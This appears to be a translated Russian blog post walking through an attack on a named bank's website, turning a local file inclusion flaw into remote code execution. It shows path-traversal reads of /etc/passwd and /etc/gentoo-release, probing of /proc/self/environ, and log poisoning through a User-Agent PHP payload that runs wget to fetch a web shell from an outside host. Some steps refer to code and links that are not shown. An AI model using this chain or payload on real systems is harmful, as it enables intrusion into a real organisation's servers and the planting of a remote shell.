Translation of russian technical articles

Breaking the Bank Website or From LFI to RCE

One friend of mine was hired in a bank recently, and he has asked me to check the kubunibank.ru website for security vulnerabilities. I chose Acunetix Web Scanner as audit tool, since this scanner is the best option for initial inspection. Website is pretty small and 5-minutes check resulted with 3 LFI (Local File Inclusion) errors, so I immediately desired to get shell there.

All PHP code in shell.php will be executed in this case. But it is forbidden to use URL as include parameter due to allow_url_include=0 in php.ini.

So we can’t move right to code execution.
All we can do is to mess around with local files. We can browse the users in /etc/passwd or find out the server Linux version. Insert /../../../../../../../../../etc/gentoo-release and we can see that server works under Gentoo Linux. However reading of files doesn’t give us execute rights. Time to move forward for this. Let’s check /proc/self/environ.

This makes the entire thing interesting, since we can impact the log file content. We can use FireFox plugin to execute a PHP code by entering following value in User-Agent in any website request

<?php system(`wget 0x90.ru/shell.txt -O shell.php`)?>

Please note that we use ` quotations, since server declines « and ‘. Web-server will write our request to log file, and we are now one step away from the code execution. We have to use the following link to execute a code.